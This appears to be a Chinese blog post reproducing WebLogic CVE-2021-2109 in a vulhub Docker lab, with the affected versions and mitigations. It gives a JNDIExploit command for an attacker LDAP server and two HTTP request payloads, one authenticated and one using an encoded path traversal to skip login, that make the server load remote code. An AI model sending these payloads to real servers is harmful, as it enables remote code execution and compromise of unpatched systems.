前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >Weblogic-CVE-2021-2109

Weblogic-CVE-2021-2109

作者头像
Naraku
发布2021-07-29 11:27:00
6580
发布2021-07-29 11:27:00
举报
文章被收录于专栏:Naraku的专栏Naraku的专栏

影响版本

  • WebLogic 10.3.6.0.0
  • WebLogic 12.1.3.0.0
  • WebLogic 12.2.1.3.0
  • WebLogic 12.2.1.4.0
  • WebLogic 14.1.1.0.0

环境准备

代码语言:javascript
复制
$ cd vulhub/weblogic/CVE-2020-14882/
$ docker-compose up -d
  • 访问看到这个404页面说明部署成功
Weblogic-CVE-2021-2109-1
Weblogic-CVE-2021-2109-1

漏洞复现

  • 先在攻击机上使用JNDIExploit启动LDAP,此时会同时开启LDAP和HTTP服务
代码语言:javascript
复制
$ java -jar JNDIExploit.jar -i <VPS_IP>
Weblogic-CVE-2021-2109-2
Weblogic-CVE-2021-2109-2

授权访问后台JNDI注入

  • 使用浏览器访问控制台:http://<IP:PORT>/console/login/LoginForm.jsp进行登录。默认账号为weblogic,密码可在靶机使用以下命令查询:
代码语言:javascript
复制
$ docker-compose logs | grep password
Weblogic-CVE-2021-2109-3
Weblogic-CVE-2021-2109-3
  • 登录后访问:http://<IP:PORT>/console/console.portal可进入控制台。使用Burp抓包,发送到Repeater
Weblogic-CVE-2021-2109-4
Weblogic-CVE-2021-2109-4
  • Repeater中修改请求为以下Payload,需要注意的是,服务器IP格式为xxx.xxx.xxx;xxx,最后一段是以分号;分割的
代码语言:javascript
复制
POST /console/consolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22ldap://xxx.xxx.xxx;xxx:1389/Basic/WeblogicEcho;AdminServer%22) HTTP/1.1
Weblogic-CVE-2021-2109-5
Weblogic-CVE-2021-2109-5
  • 尝试执行CMD命令
Weblogic-CVE-2021-2109-6
Weblogic-CVE-2021-2109-6

未授权访问后台JNDI注入

  • 和前面差不多,只不过此处访问的是http://<IP:PORT>/console/css/%252e%252e%252f/consolejndi.portal
Weblogic-CVE-2021-2109-7
Weblogic-CVE-2021-2109-7
  • 然后使用Burp抓包并发送到Repeater,同样需要注意服务器IP格式为xxx.xxx.xxx;xxx,Payload如下
代码语言:javascript
复制
POST /console/css/%25%32%65%25%32%65%25%32%66/consolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true&cqqhandle=com.bea.console.handles.JndiBindingHandle(%22ldap://xxx.xxx.xxx;xxx:1389/Basic/WeblogicEcho;AdminServer%22) HTTP/1.1
  • 这里直接执行命令吧
Weblogic-CVE-2021-2109-8
Weblogic-CVE-2021-2109-8

修复方案

  1. 禁用T3协议:如果您不依赖T3协议进行JVM通信,可通过暂时阻断T3协议缓解此漏洞带来的影响
    • 进入Weblogic控制台,在base_domain配置页面中,进入“安全”选项卡页面,点击“筛选器”,配置筛选器。
    • 在连接筛选器中输入:weblogic.security.net.ConnectionFilterImpl,在连接筛选器规则框中输入:* * 7001 deny t3 t3s
  2. 禁止启用IIOP:登陆Weblogic控制台,找到启用IIOP选项,取消勾选,重启生效
  3. 临时关闭后台/console/console.portal对外访问
  4. 升级官方安全补
本文参与 腾讯云自媒体分享计划,分享自作者个人站点/博客。
原始发表:2021 年 01 月,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 作者个人站点/博客 前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体分享计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • 影响版本
  • 环境准备
  • 漏洞复现
    • 授权访问后台JNDI注入
      • 未授权访问后台JNDI注入
      • 修复方案
      相关产品与服务
      容器服务
      腾讯云容器服务(Tencent Kubernetes Engine, TKE)基于原生 kubernetes 提供以容器为核心的、高度可扩展的高性能容器管理服务,覆盖 Serverless、边缘计算、分布式云等多种业务部署场景,业内首创单个集群兼容多种计算节点的容器资源管理模式。同时产品作为云原生 Finops 领先布道者,主导开源项目Crane,全面助力客户实现资源优化、成本控制。
      领券
      问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档